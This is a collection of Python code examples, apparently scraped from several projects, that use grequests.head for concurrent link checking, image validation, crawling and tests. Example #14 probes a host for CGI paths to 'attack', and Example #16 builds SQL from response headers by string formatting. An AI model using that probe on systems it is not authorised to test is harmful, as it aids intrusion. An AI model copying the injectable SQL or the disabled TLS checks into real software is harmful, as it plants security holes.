Example #1
    def run(self):

        total = 0
        totals = {}
        bad_results = 0

        with open(self.hjson_path) as f:
            sites = json.load(f)

        rs = (grequests.head(s.get('url'),
                             hooks={'response': [self.hook_factory(s)]})
              for s in sites.get('base_urls'))
        for r in grequests.imap(rs, size=20):
            total += 1
            if totals.get(r.status_code):
                totals[r.status_code] += 1
            else:
                totals[r.status_code] = 1
            if r.status_code >= 400:
                bad_results += 1

        print('========================================================')
        print('Summary')
        print('========================================================')
        print('Total requests: %d' % total)
        print('Bad responses: %d' % bad_results)
        for sc in totals:
            print('Status Code %d: %d' % (sc, totals[sc]))

        self.dispatcher.command_complete.emit(0)
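Example #1 relies on a hook_factory method that is not shown. A minimal sketch of such a per-site response hook, assuming it only needs the site entry and the response (the implementation below is illustrative, not the original):

    def hook_factory(self, site):
        # Illustrative stand-in: build a response hook bound to one entry
        # from the JSON file loaded in run().
        def on_response(response, *args, **kwargs):
            # requests invokes response hooks with the Response plus extra
            # keyword arguments, so the signature stays permissive.
            print('%s -> %d' % (site.get('url'), response.status_code))
        return on_response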
Example #2
def make_grequest(urls, content=False, size=5):
    """
        Return a dict keyed by each url in urls, mapping it to its
        status_code and, if content is True, its content
    """
    try:
        reqs = set()
        ret = dict()
        if content:
            reqs = (grequests.get(url) for url in urls)
        else:
            reqs = (grequests.head(url) for url in urls)

        res = grequests.map(reqs, stream=False, size=size)
        for url, r in zip(urls, res):
            log.info('Made Request %s :: %d ' % (url, r.status_code))
            if content:
                ret[url] = {'status_code': r.status_code, 'content': r.text}
            else:
                ret[url] = {'status_code': r.status_code}
        if ret:
            return ret

        raise Exception
    except Exception as e:
        log.exception('Error in make_grequest')
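A minimal usage sketch of the helper above, assuming the surrounding module configures the log object it uses (the URLs are placeholders):

statuses = make_grequest(['https://example.com', 'https://example.org'])
# Expected shape:
# {'https://example.com': {'status_code': 200},
#  'https://example.org': {'status_code': 200}}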
Example #3
    def cdn_images(urls):
        rs = []
        for (k, v) in urls.items():
            hostname = urlparse(k).hostname
            path = urlparse(k).path
            query = urlparse(k).query

            key = ''.join([
                str(hashlib.md5(hostname.encode('utf-8')).hexdigest())[:8], '/',
                hashlib.md5(k.encode('utf-8')).hexdigest()
            ])
            urls[k] = ''.join(['http://p.cdn.sohu.com/', key])

            url = ''.join(['http://bjcnc.scs-in.sohucs.com/storage', path])
            if query:
                url = ''.join([url, '?', query])

            rs.append(
                grequests.head(url,
                               headers={
                                   'x-scs-meta-mirror-host': hostname,
                                   'x-scs-meta-upload-key': key
                               }))
        grequests.map(rs)

        return urls
Example #4
    def scan(self, session):
        time_started = time.strftime('%Y-%m-%d %H:%M:%S')
        author = getpass.getuser()
        http, https = self.supported.keys()[0], self.supported.keys()[1]
        url_factory = self.url_factory()
        urls = url_factory(http, session) + url_factory(https, session)

        self.session = session

        async_requests = [
            grequests.head(
                url=url,
                allow_redirects=False,
                headers={
                    'User-Agent': settings.USER_AGENT, 'Host': host},
                hooks=dict(response=self.success_hook),
                timeout=settings.TIMEOUT) for host, url in urls]

        grequests.map(
            requests=async_requests,
            size=settings.CONCURRENT_REQUESTS,
            exception_handler=self.failure_hook)

        time_ended = time.strftime('%Y-%m-%d %H:%M:%S')
        scan_instance = ScanInstance(
            start_time=time_started,
            end_time=time_ended,
            author=author)

        self.session.add(scan_instance)
        export_xlsx(session)
Example #5
def make_grequest(urls, content=False, size=5):
    """
        Return a dict keyed by each url in urls, mapping it to its
        status_code and, if content is True, its content
    """
    try:
        reqs = set()
        ret = dict()
        if content:
            reqs = (grequests.get(url) for url in urls)
        else:
            reqs = (grequests.head(url) for url in urls)

        res = grequests.map(reqs, stream=False, size=size)
        for url, r in zip(urls, res):
            log.info('Made Request %s :: %d ' % (url, r.status_code))
            if content:
                ret[url] = {
                    'status_code': r.status_code,
                    'content': r.text
                }
            else:
                ret[url] = {
                    'status_code': r.status_code
                }
        if ret:
            return ret

        raise Exception
    except Exception as e:
        log.exception('Error in make_grequest')
Example #6
def wake_sites():
    rs = []
    for user in User.query.filter(User.roles.any(Role.name == 'user'),
                                  User.roles.any(Role.name == 'decal')):
        if user.website:
            rs.append(grequests.head(user.website))
            print colored('Waking %s' % user.website, 'yellow')
    grequests.map(rs)
    print colored("%d sites awoken!" % len(rs), 'green')
Example #7
def check_transparency_portal_existance(dataset, portal_urls):
    dataset['transparency_portal_url'] = 'None'
    dataset['status_code'] = 0

    for url in portal_urls:
        dataset['transparency_portal_url'] = dataset.apply(format_url, axis=1, args=(url,))
        rs = (grequests.head(u) for u \
              in list(dataset.loc[dataset['status_code'] == 0, 'transparency_portal_url']))

        responses = grequests.map(rs, exception_handler=exception_handler)
        responses = [get_status_code(r) for r in responses]

        dataset.loc[dataset['status_code'] == 0, 'status_code'] = responses
        dataset.loc[dataset['status_code'] == 0, 'transparency_portal_url'] = 'None'
Example #8
def test_fetch_cards_sending_requests_by_batches_not_blocking_for_responses():
    """
    Send requests but don't block for the response.
    Use a request pool to keep a threshold of maximum number of requests.
    Use a callback to get notified of the response.
    """
    urls = [mtgurl.make_vanilla_url(cardname) for cardname in CARDS]
    reqs = (grequests.head(url, allow_redirects=True, callback=_on_response)
            for url in urls)
    pool = grequests.Pool(30)
    for req in reqs:
        grequests.send(req, pool)

    # Don't exit until we received the responses, otherwise we may lose some of them
    import time
    time.sleep(20)
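Instead of sleeping for a fixed 20 seconds, the pool itself can be waited on. A sketch under the assumption that grequests.Pool is the usual gevent pool, so join() blocks until every spawned request greenlet has finished (URLs are placeholders; the response callback is omitted):

import grequests

urls = ['https://example.com', 'https://example.org']
reqs = (grequests.head(url, allow_redirects=True) for url in urls)
pool = grequests.Pool(30)
for req in reqs:
    grequests.send(req, pool)
# Block until all in-flight requests complete instead of guessing a delay.
pool.join()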
Example #9
    def _check_urls(self):
        """
        Concurrently check a batch of URLs, limited by the SITEMAP_CHECK_LIMIT
        setting, displaying progress in the console.
        """

        total = len(self.urls)
        for i in range(0, len(self.urls), settings.SITEMAP_CHECK_LIMIT):
            r = (grequests.head(u) for u in self.urls[i:i + settings.SITEMAP_CHECK_LIMIT])
            rs = grequests.map(r)
            self.error_urls += filter(lambda x: x.status_code not in [200, 301, 302], rs)
            self.checked_urls += len(self.urls[i:i + settings.SITEMAP_CHECK_LIMIT])
            remained = total - self.checked_urls
            progress = round(100.0 * self.checked_urls / total, 2)
            sys.stdout.write('\rChecked %.2f%% (%s URLs, %d errors, %d remained)' %
                             (progress, self.checked_urls, len(self.error_urls), remained))
            sys.stdout.flush()
Example #10
def check_transparency_portal_existance(dataset, portal_urls):
    dataset['transparency_portal_url'] = 'None'
    dataset['status_code'] = 0

    for url in portal_urls:
        dataset['transparency_portal_url'] = dataset.apply(format_url,
                                                           axis=1,
                                                           args=(url, ))
        rs = (grequests.head(u) for u \
              in list(dataset.loc[dataset['status_code'] == 0, 'transparency_portal_url']))

        responses = grequests.map(rs, exception_handler=exception_handler)
        responses = [get_status_code(r) for r in responses]

        dataset.loc[dataset['status_code'] == 0, 'status_code'] = responses
        dataset.loc[dataset['status_code'] == 0,
                    'transparency_portal_url'] = 'None'
Example #11
def fetch_by_url_async(urls):
    reqs = (grequests.head(url, allow_redirects=True) for url in urls)
    responses = grequests.map(reqs,
                              size=10,
                              exception_handler=_exception_handler)
    cardset_found = {}

    for response in responses:
        card_found = True
        try:
            _check_found(response)
        except NotFound:
            card_found = False
        finally:
            cardset_found[response.url] = card_found

    return cardset_found
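Several of these examples pass an exception_handler to grequests.map or grequests.imap without showing one. A minimal sketch of what the _exception_handler assumed above might look like; grequests calls it with the failed request and the exception, and the corresponding slot in the mapped results is left as None:

def _exception_handler(request, exception):
    # request is the grequests AsyncRequest that failed; exception is the
    # error raised while sending it.
    print('request to %s failed: %s' % (request.url, exception))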
Example #12
    def run(self, fn_on_response, *args, **kwargs):
        logger.info('executor start')
        start_time = time.time()
        no_more_task, urls = self.get_next_task(self.max_workers)
        while True:
            if not len(urls):
                break

            tmp_urls = []
            urls = (grequests.head(u, timeout=self.timeout) for u in urls)
            for r in grequests.imap(urls):
                fn_on_response(r)
                no_more_task, urls = self.get_next_task(self.max_workers)
                if len(urls):
                    break

        end_time = time.time()
        logger.info('executor done, %.3fs' % (end_time - start_time))
Example #13
def main():
    today = datetime.date.today()
    with open('top-1m_{0}.csv'.format(today), 'r') as csvfile:
        raw = csv.reader(csvfile)
        alexa = [(rank, 'http://' + host) for rank, host in raw]
        alexa_chunks = []
        for x in range(0, len(alexa), 10):
            req = [grequests.head(u[1], timeout=1, allow_redirects=False) for u in alexa[x:x + 10]]
            rsp = grequests.map(req)
            durations = []
            for a in rsp:
                try:
                    durations.append((a.url, a.elapsed))
                except:
                    pass

            print durations
Example #14
def check_urls(host, port, is_https=False, url_list=CGI_FILES):
    """
    Check which URLs exist
    :return: Sequence of URLs to try and attack
    """
    import grequests
    attack_path = 'http://'
    if is_https:
        attack_path = 'https://'
    attack_path = attack_path + str(host) + ":" + str(port)
    attack_urls = [attack_path + url for url in url_list]
    reqs = (grequests.head(u, verify=False, timeout=TIMEOUT)
            for u in attack_urls)
    resps = grequests.map(reqs, size=15)
    valid_resps = [
        resp for resp in resps
        if resp and resp.status_code == requests.codes.ok
    ]
    urls = [resp.url for resp in valid_resps]
    return urls
Example #15
    def _check_urls(self):
        """
        Concurrently check a batch of URLs, limited by the SITEMAP_CHECK_LIMIT
        setting, displaying progress in the console.
        """

        total = len(self.urls)
        for i in range(0, len(self.urls), settings.SITEMAP_CHECK_LIMIT):
            r = (grequests.head(u)
                 for u in self.urls[i:i + settings.SITEMAP_CHECK_LIMIT])
            rs = grequests.map(r)
            self.error_urls += filter(
                lambda x: x.status_code not in [200, 301, 302], rs)
            self.checked_urls += len(self.urls[i:i +
                                               settings.SITEMAP_CHECK_LIMIT])
            remained = total - self.checked_urls
            progress = round(100.0 * self.checked_urls / total, 2)
            sys.stdout.write(
                '\rChecked %.2f%% (%s URLs, %d errors, %d remained)' %
                (progress, self.checked_urls, len(self.error_urls), remained))
            sys.stdout.flush()
Example #16
def convert_url(filtered):
    """ Next step is getting a jobs listings url, we do this by checking the header of 'careerjet.co.th' link """

    job = (grequests.head(u, allow_redirects=False, verify=False, timeout=5) for x, u in filtered)
    try:
        mp = grequests.map(job)
    except requests.ConnectionError as e:
        print e
    except BaseException as e:
        print e
    converted_list = []
    db = conn()
    cursor = db.cursor()
    for url in mp:
        converted_list.append([url.headers['location']])
        cursor.execute(
            "UPDATE job_url SET converted_url='{url}' WHERE url='{original_url}'".format(url=url.headers['location'],
                                                                                         original_url=url.url))
        db.commit()
        print 'data was updated :', url.headers['location']
    db.close()
Example #17
def check_urls_in_rfm_resolve_correctly(records):
    """
    Do HEAD requests on all files in remote file manifests to test that the
    links we build point to real files.
    :return:
    """
    rfms = [r[1] for r in records]

    urls, file_lengths = [], []
    for rfm in rfms:
        for record in rfm:
            urls.append(record['url'])
            file_lengths.append(record['length'])

    rs = (grequests.head(u) for u in urls)
    map = grequests.map(rs)

    failures = [
        url for request, url in zip(map, urls) if request.status_code != 200
    ]

    if not failures:
        print('SUCCESS: All "URL"s in the remote file manifests '
              'resolved to files on s3! ({} files checked)'.format(len(urls)))
    else:
        print('FAIL: The following URLs did not resolve: \n{}'.format(
            '\n'.join(failures)))

    responses = [(url, length, request.headers['Content-Length'])
                 for request, url, length in zip(map, urls, file_lengths)
                 if int(request.headers['Content-Length']) != int(length)]
    infos = [('RFM Length: {}, Expected: {}, URL: {}'
              ''.format(length, expected, url))
             for url, length, expected in responses]

    if not responses:
        print('SUCCESS: All sizes match the rfms!')
    else:
        print('FAIL: The following URLs have mismatching size: \n{}'
              ''.format('\n'.join(infos)))
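A sketch of the records structure this check appears to assume, where r[1] is a remote file manifest listing a url and length for each file (identifiers, URLs, and sizes are placeholders):

records = [
    ('bag-0001', [
        {'url': 'https://example-bucket.s3.amazonaws.com/data/file1.csv',
         'length': 1024},
        {'url': 'https://example-bucket.s3.amazonaws.com/data/file2.csv',
         'length': 2048},
    ]),
]
check_urls_in_rfm_resolve_correctly(records)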
Example #18
def startTaskParallal(dataLIst):
    concurrent_limit = 100
    hdrs = {'connection': 'keep-alive'}
    urls = []
    tmp_data = {}
    for row in dataLIst:
        id, d, firstLabel, secondLabel, title, link, isExternal = row

        isExternal = int(isExternal)
        url = link
        if not isExternal:
            url = d + link

        urls.append([id, url, isExternal])
        tmp_data[id] = row

    rs = (grequests.head(
        u[1], allow_redirects=False, params={'uniqueid': u[0]}) if u[2] else
          grequests.get(u[1], allow_redirects=False, params={'uniqueid': u[0]})
          for u in urls)
    #res = grequests.map(rs)
    for res in grequests.imap(rs, size=concurrent_limit):

        if res is not None:
            url = res.url
            #print(url)
            params = parse_qs(urlparse(url).query)

            if 'uniqueid' in params:
                key = int(params['uniqueid'][0])

                id, d, firstLabel, secondLabel, title, link, isExternal = tmp_data[
                    key]

                data.append(
                    (d, firstLabel, secondLabel, title, link, res.status_code,
                     len(res.content), isExternal))
                ids.append(id)
                print(len(ids))
Example #19
def test_fetch_cards_sending_requests_by_batches_blocking_for_responses():
    """
    Send requests blocking for the response.
    Use a request pool to keep a threshold of maximum number of requests.
    Block until all responses are received.
    """
    import time
    start = time.time()
    urls = [mtgurl.make_vanilla_url(cardname) for cardname in CARDS]
    reqs = (grequests.head(url, allow_redirects=True) for url in urls)
    responses = grequests.imap(reqs, size=30)

    delay = 1
    time.sleep(delay)

    index = 0
    for response in responses:
        print(response.url)
        assert response
        assert response.status_code in [200]
        index += 1

    stop = time.time()
    print(stop - start - delay)
Example #20
def validate_images(results, image_urls):
    """
    Make sure images exist before we display them. Treat redirects as broken
    links since 99% of the time the redirect leads to a generic "not found"
    placeholder.

    Results are cached in redis and shared amongst all API servers in the
    cluster.
    """
    if not image_urls:
        return
    start_time = time.time()
    # Pull matching images from the cache.
    redis = get_redis_connection("default")
    cache_prefix = 'valid:'
    cached_statuses = redis.mget([cache_prefix + url for url in image_urls])
    cached_statuses = [
        int(b.decode('utf-8')) if b is not None else None
        for b in cached_statuses
    ]
    # Anything that isn't in the cache needs to be validated via HEAD request.
    to_verify = {}
    for idx, url in enumerate(image_urls):
        if cached_statuses[idx] is None:
            to_verify[url] = idx
    reqs = (grequests.head(u, allow_redirects=False, timeout=0.2, verify=False)
            for u in to_verify.keys())
    verified = grequests.map(reqs, exception_handler=_validation_failure)
    # Cache newly verified image statuses.
    to_cache = {}
    for idx, url in enumerate(to_verify.keys()):
        cache_key = cache_prefix + url
        if verified[idx]:
            status = verified[idx].status_code
        # Response didn't arrive in time. Try again later.
        else:
            status = -1
        to_cache[cache_key] = status

    thirty_minutes = 60 * 30
    twenty_four_hours_seconds = 60 * 60 * 24
    pipe = redis.pipeline()
    if len(to_cache) > 0:
        pipe.mset(to_cache)
    for key, status in to_cache.items():
        # Cache successful links for a day, and broken links for 120 days.
        if status == 200:
            pipe.expire(key, twenty_four_hours_seconds)
        elif status == -1:
            # Content provider failed to respond; try again in a short interval
            pipe.expire(key, thirty_minutes)
        else:
            pipe.expire(key, twenty_four_hours_seconds * 120)
    pipe.execute()

    # Merge newly verified results with cached statuses
    for idx, url in enumerate(to_verify):
        cache_idx = to_verify[url]
        if verified[idx] is not None:
            cached_statuses[cache_idx] = verified[idx].status_code
        else:
            cached_statuses[cache_idx] = -1

    # Delete broken images from the search results response.
    for idx, _ in enumerate(cached_statuses):
        del_idx = len(cached_statuses) - idx - 1
        status = cached_statuses[del_idx]
        if status == 429 or status == 403:
            log.warning(
                'Image validation failed due to rate limiting or blocking. '
                'Affected URL: {}'.format(image_urls[idx]))
        elif status != 200:
            log.info('Deleting broken image with ID {} from results.'.format(
                results[del_idx]['identifier']))
            del results[del_idx]
    end_time = time.time()
    log.info('Validated images in {} '.format(end_time - start_time))
Example #21
def validate_images(query_hash, start_slice, results, image_urls):
    """
    Make sure images exist before we display them. Treat redirects as broken
    links since 99% of the time the redirect leads to a generic "not found"
    placeholder.

    Results are cached in redis and shared amongst all API servers in the
    cluster.
    """
    logger = parent_logger.getChild("validate_images")
    if not image_urls:
        logger.info("no image urls to validate")
        return

    logger.debug("starting validation")
    start_time = time.time()
    # Pull matching images from the cache.
    redis = django_redis.get_redis_connection("default")
    cache_prefix = "valid:"
    cached_statuses = redis.mget([cache_prefix + url for url in image_urls])
    cached_statuses = [
        int(b.decode("utf-8")) if b is not None else None
        for b in cached_statuses
    ]
    logger.debug(f"len(cached_statuses)={len(cached_statuses)}")
    # Anything that isn't in the cache needs to be validated via HEAD request.
    to_verify = {}
    for idx, url in enumerate(image_urls):
        if cached_statuses[idx] is None:
            to_verify[url] = idx
    logger.debug(f"len(to_verify)={len(to_verify)}")
    reqs = (grequests.head(u, allow_redirects=False, timeout=2, verify=False)
            for u in to_verify.keys())
    verified = grequests.map(reqs, exception_handler=_validation_failure)
    # Cache newly verified image statuses.
    to_cache = {}
    for idx, url in enumerate(to_verify.keys()):
        cache_key = cache_prefix + url
        if verified[idx]:
            status = verified[idx].status_code
        # Response didn't arrive in time. Try again later.
        else:
            status = -1
        to_cache[cache_key] = status

    thirty_minutes = 60 * 30
    twenty_four_hours_seconds = 60 * 60 * 24
    pipe = redis.pipeline()
    if len(to_cache) > 0:
        pipe.mset(to_cache)
    for key, status in to_cache.items():
        # Cache successful links for a day, and broken links for 120 days.
        if status == 200:
            logger.debug("healthy link " f"key={key} ")
            pipe.expire(key, twenty_four_hours_seconds)
        elif status == -1:
            logger.debug("no response from provider " f"key={key}")
            # Content provider failed to respond; try again in a short interval
            pipe.expire(key, thirty_minutes)
        else:
            logger.debug("broken link " f"key={key} ")
            pipe.expire(key, twenty_four_hours_seconds * 120)
    pipe.execute()

    # Merge newly verified results with cached statuses
    for idx, url in enumerate(to_verify):
        cache_idx = to_verify[url]
        if verified[idx] is not None:
            cached_statuses[cache_idx] = verified[idx].status_code
        else:
            cached_statuses[cache_idx] = -1

    # Create a new dead link mask
    new_mask = [1] * len(results)
    # Delete broken images from the search results response.
    for idx, _ in enumerate(cached_statuses):
        del_idx = len(cached_statuses) - idx - 1
        status = cached_statuses[del_idx]
        if status == 429 or status == 403:
            logger.warning(
                "Image validation failed due to rate limiting or blocking. "
                f"url={image_urls[idx]} "
                f"status={status} ")
        elif status != 200:
            logger.info("Deleting broken image from results "
                        f"id={results[del_idx]['identifier']} "
                        f"status={status} ")
            del results[del_idx]
            new_mask[del_idx] = 0

    # Merge and cache the new mask
    mask = get_query_mask(query_hash)
    if mask:
        new_mask = mask[:start_slice] + new_mask
    save_query_mask(query_hash, new_mask)

    end_time = time.time()
    logger.debug("end validation "
                 f"end_time={end_time} "
                 f"start_time={start_time} "
                 f"delta={end_time - start_time} ")
Example #22
def main():
    parse_argument(sys.argv[1:])

    if LOCAL:
        all_links = get_local_license()
    else:
        all_links = get_global_license()

    GITHUB_BASE = ("https://raw.githubusercontent.com/creativecommons"
                   "/creativecommons.org/master/docroot/legalcode/")

    errors_total = 0
    for license in all_links:
        try:
            license_name = license.string
        except AttributeError:
            license_name = license
        caught_errors = 0
        page_url = "{}{}".format(GITHUB_BASE, license_name)
        print("\n")
        print("Checking:", license_name)
        # Refer to issue for more info on samplingplus_1.0.br.htm:
        #   https://github.com/creativecommons/cc-link-checker/issues/9
        if license_name == "samplingplus_1.0.br.html":
            continue
        filename = license_name[:-len(".html")]
        base_url = create_base_link(filename)
        print("URL:", base_url)
        if LOCAL:
            source_html = request_local_text(license_name)
        else:
            source_html = request_text(page_url)
        license_soup = BeautifulSoup(source_html, "lxml")
        links_in_license = license_soup.find_all("a")
        verbose_print("Number of links found:", len(links_in_license))
        verbose_print("Errors and Warnings:")
        valid_anchors, valid_links = get_scrapable_links(
            base_url, links_in_license)
        if valid_links:
            memoized_results = get_memoized_result(valid_links, valid_anchors)
            stored_links = memoized_results[0]
            stored_anchors = memoized_results[1]
            stored_result = memoized_results[2]
            check_links = memoized_results[3]
            check_anchors = memoized_results[4]
            if check_links:
                rs = (
                    # Since we're only checking for validity, we can retrieve
                    # only the headers/metadata
                    grequests.head(link, timeout=REQUESTS_TIMEOUT)
                    for link in check_links)
                responses = list()
                # Explicitly close connections to free up file handles and
                # avoid Connection Errors per:
                # https://stackoverflow.com/questions/21978115/using-grequests-to-make-several-thousand-get-requests-to-sourceforge-get-max-r/22839550#22839550
                for response in grequests.map(
                        rs, exception_handler=exception_handler):
                    try:
                        responses.append(response.status_code)
                        response.close()
                    except AttributeError:
                        responses.append(response)
                memoize_result(check_links, responses)
                stored_anchors += check_anchors
                stored_result += responses
            stored_links += check_links
            caught_errors = write_response(
                stored_links,
                stored_result,
                base_url,
                license_name,
                stored_anchors,
            )

        if caught_errors:
            errors_total += caught_errors
            ERR_CODE = 1

    print("\nCompleted in: {}".format(time.time() - START_TIME))

    if OUTPUT_ERR:
        output_summary(all_links, errors_total)
        print("\nError file present at: ", OUTPUT.name)
        output_test_summary(errors_total)

    sys.exit(ERR_CODE)
Example #23
def main():
    # get argument
    parser = OptionParser(
        usage='Usage: %prog [<CDN_URL>]'
        '\n\nArguments:'
        '\n  CDN_URL    Of the format "<scheme>://<fqdn>".'
        ' Trailing "/" not allowed.'
        '\n\nExamples:'
        '\n  %prog https://tiles.cdn.mozilla.net'
    )
    parser.set_defaults(
        quiet=False,
        verbose=False,
    )
    parser.add_option(
        '-q', '--quiet',
        action='store_true',
        dest='quiet',
        help="Don't report NOTICE",
    )
    parser.add_option(
        '-v', '--verbose',
        action='store_true',
        dest='verbose',
        help='Report SUCCESS',
    )
    options, args = parser.parse_args()

    try:
        from splice.environment import Environment
        config = Environment.instance().config
        cdn = 'https://%s.s3.amazonaws.com' % config.S3['bucket']
        tile_index_key = config.S3['tile_index_key']
    except Exception:
        cdn = 'https://tiles.cdn.mozilla.net'
        tile_index_key = 'tile_index_v3.json'

    channels = [
        'desktop',
        'android',
        'desktop-prerelease',
        'hello'
    ]

    if len(args) == 1:
        cdn = args.pop()
    elif len(args) > 1:
        parser.parse_args(['-h'])

    if not options.quiet:
        print(
            'NOTICE: crawling: %s/%s_%s' %
            (cdn, tuple(channels), tile_index_key)
        )
        print('NOTICE: calculating tiles urls')

    errors = []

    # extract tiles urls from tile index
    try:
        urls = [
            tiles_url
            for index in validate(
                grequests.imap(
                    (grequests.get('%s/%s_%s' % (cdn, channel, tile_index_key), allow_redirects=False,)
                     for channel in channels),
                    size=10
                ),
                options.verbose,
                errors,
            )
            for key, value in index.json().iteritems()
            if '/' in key
            for tiles_url in value.values()
        ]

        tiles_urls = set()
        for url in urls:
            if type(url) is list:
                tiles_urls.update(url)
            else:
                tiles_urls.add(url)

        if not options.quiet:
            print('NOTICE: tiles urls extracted: %s' % len(tiles_urls))
            print('NOTICE: calculating image urls')

        # extract image urls from tiles
        image_urls = set([
            image_url
            for tiles in validate(
                grequests.imap(
                    (grequests.get(tiles_url, allow_redirects=False)
                     for tiles_url in tiles_urls),
                    size=10
                ),
                options.verbose,
                errors,
            )
            for value_x in tiles.json().values()
            for value_y in value_x
            for key, image_url in value_y.iteritems()
            if key in ['imageURI', 'enhancedImageURI']
        ])

        if not options.quiet:
            print('NOTICE: image urls extracted: %s' % len(image_urls))
            print('NOTICE: validating image urls')

        # Two things to notice here:
        # 1. expanding the list comprehension is necessary to get the 'validate'
        #    step above to actually evaluate (it's lazy.)
        # 2. the actual value of the list comprehension is dropped, not returned.
        [
            valid.url
            for valid in validate(
                grequests.imap(
                    (grequests.head(image_url, allow_redirects=False)
                     for image_url in image_urls),
                    size=10
                ),
                options.verbose,
                errors,
            )
        ]
    except Exception as e:
        msg = 'ERROR: %s' % e
        print(msg)
        print(traceback.format_exc())
        errors.append(msg)

    if errors:
        exit(1)
Example #24
def main():
    args = parse_argument(sys.argv[1:])

    if args.local:
        license_names = get_local_licenses()
    else:
        license_names = get_github_licenses()
    if args.log_level <= INFO:
        print("Number of files to be checked:", len(license_names))
    errors_total = 0
    exit_status = 0
    for license_name in license_names:
        caught_errors = 0
        context_printed = False
        filename = license_name[:-len(".html")]
        base_url = create_base_link(args, filename)
        context = f"\n\nChecking: {license_name}\nURL: {base_url}"
        if args.local:
            source_html = request_local_text(license_name)
        else:
            page_url = "{}{}".format(GITHUB_BASE, license_name)
            source_html = request_text(page_url)
        license_soup = BeautifulSoup(source_html, "lxml")
        links_in_license = license_soup.find_all("a")
        link_count = len(links_in_license)
        if args.log_level <= INFO:
            print(f"{context}\nNumber of links found: {link_count}")
            context_printed = True
        valid_anchors, valid_links, context_printed = get_scrapable_links(
            args, base_url, links_in_license, context, context_printed)
        if valid_links:
            memoized_results = get_memoized_result(valid_links, valid_anchors)
            stored_links = memoized_results[0]
            stored_anchors = memoized_results[1]
            stored_result = memoized_results[2]
            check_links = memoized_results[3]
            check_anchors = memoized_results[4]
            if check_links:
                rs = (
                    # Since we're only checking for validity, we can retrieve
                    # only the headers/metadata
                    grequests.head(link, timeout=REQUESTS_TIMEOUT)
                    for link in check_links)
                responses = list()
                # Explicitly close connections to free up file handles and
                # avoid Connection Errors per:
                # https://stackoverflow.com/a/22839550
                for response in grequests.map(
                        rs, exception_handler=exception_handler):
                    try:
                        responses.append(response.status_code)
                        response.close()
                    except AttributeError:
                        responses.append(response)
                memoize_result(check_links, responses)
                stored_anchors += check_anchors
                stored_result += responses
            stored_links += check_links
            caught_errors = write_response(
                args,
                stored_links,
                stored_result,
                base_url,
                license_name,
                stored_anchors,
                context,
                context_printed,
            )

        if caught_errors:
            errors_total += caught_errors
            exit_status = 1

    print("\nCompleted in: {}".format(time.time() - START_TIME))

    if args.output_errors:
        output_summary(args, license_names, errors_total)
        print("\nError file present at: ", args.output_errors.name)
        output_test_summary(errors_total)

    sys.exit(exit_status)
Example #25
def check_legalcode(args):
    print("\n\nChecking LegalCode License...\n\n")
    license_names = get_legalcode(args)
    if args.log_level <= INFO:
        print("Number of files to be checked:", len(license_names))
    errors_total = 0
    exit_status = 0
    for license_name in license_names:
        caught_errors = 0
        context_printed = False
        filename = license_name[:-len(".html")]
        base_url = create_base_link(args, filename)
        context = f"\n\nChecking: legalcode\nURL: {base_url}"
        if args.local:
            source_html = request_local_text(LICENSE_LOCAL_PATH, license_name)
        else:
            page_url = "{}{}".format(LICENSE_GITHUB_BASE, license_name)
            source_html = request_text(page_url)
        license_soup = BeautifulSoup(source_html, "lxml")
        links_found = license_soup.find_all("a")
        link_count = len(links_found)
        if args.log_level <= INFO:
            print(f"{context}\nNumber of links found: {link_count}")
            context_printed = True
        valid_anchors, valid_links, context_printed = get_scrapable_links(
            args, base_url, links_found, context, context_printed)
        if valid_links:
            memoized_results = get_memoized_result(valid_links, valid_anchors)
            stored_links = memoized_results[0]
            stored_anchors = memoized_results[1]
            stored_result = memoized_results[2]
            check_links = memoized_results[3]
            check_anchors = memoized_results[4]
            if check_links:
                rs = (
                    # Since we're only checking for validity, we can retrieve
                    # only the headers/metadata
                    grequests.head(link, timeout=REQUESTS_TIMEOUT)
                    for link in check_links)
                responses = list()
                # Explicitly close connections to free up file handles and
                # avoid Connection Errors per:
                # https://stackoverflow.com/a/22839550
                for response in grequests.map(
                        rs, exception_handler=exception_handler):
                    try:
                        responses.append(response.status_code)
                        response.close()
                    except AttributeError:
                        responses.append(response)
                memoize_result(check_links, responses)
                stored_anchors += check_anchors
                stored_result += responses
            stored_links += check_links
            caught_errors = write_response(
                args,
                stored_links,
                stored_result,
                base_url,
                license_name,
                stored_anchors,
                context,
                context_printed,
            )

        if caught_errors:
            errors_total += caught_errors
            exit_status = 1

    return license_names, errors_total, exit_status
Example #26
def check_rdfs(args, index=False):
    if index:
        print("\n\nChecking index.rdf...\n\n")
        rdf_obj_list = get_index_rdf(args)
    else:
        print("\n\nChecking RDFs...\n\n")
        rdf_obj_list = get_rdf(args)
    if args.log_level <= INFO:
        if not index:
            print("Number of RDF files to be checked:", len(rdf_obj_list))
        else:
            print(
                "Number of RDF objects/sections to be checked in index.rdf:",
                len(rdf_obj_list),
            )
    errors_total = 0
    exit_status = 0
    for rdf_obj in rdf_obj_list:
        caught_errors = 0
        context_printed = False
        rdf_url = (rdf_obj["rdf:about"]
                   if index else f"{rdf_obj['rdf:about']}rdf")
        links_found = get_links_from_rdf(rdf_obj)
        checking = "URL" if not index else "RDF_ABOUT"
        context = f"\n\nChecking: \n{checking}: {rdf_url}"
        link_count = len(links_found)
        if args.log_level <= INFO:
            print(f"{context}\nNumber of links found: {link_count}")
            context_printed = True
        base_url = rdf_url
        valid_anchors, valid_links, context_printed = get_scrapable_links(
            args,
            base_url,
            links_found,
            context,
            context_printed,
            rdf=True,
        )
        if valid_links:
            memoized_results = get_memoized_result(valid_links, valid_anchors)
            stored_links = memoized_results[0]
            stored_anchors = memoized_results[1]
            stored_result = memoized_results[2]
            check_links = memoized_results[3]
            check_anchors = memoized_results[4]
            if check_links:
                rs = (
                    # Since we're only checking for validity,
                    # we can retrieve
                    # only the headers/metadata
                    grequests.head(link, timeout=REQUESTS_TIMEOUT)
                    for link in check_links)
                responses = list()
                # Explicitly close connections to free up file handles and
                # avoid Connection Errors per:
                # https://stackoverflow.com/a/22839550
                for response in grequests.map(
                        rs, exception_handler=exception_handler):
                    try:
                        responses.append(response.status_code)
                        response.close()
                    except AttributeError:
                        responses.append(response)
                memoize_result(check_links, responses)
                stored_anchors += check_anchors
                stored_result += responses
            stored_links += check_links
            caught_errors = write_response(
                args,
                stored_links,
                stored_result,
                rdf_url,
                rdf_obj,
                stored_anchors,
                context,
                context_printed,
            )

        if caught_errors:
            errors_total += caught_errors
            exit_status = 1

    return rdf_obj_list, errors_total, exit_status
Example #27
def check_deeds(args):
    print("\n\nChecking Deeds...\n\n")
    license_names = get_legalcode(args)
    if args.log_level <= INFO:
        print("Number of files to be checked:", len(license_names))
    errors_total = 0
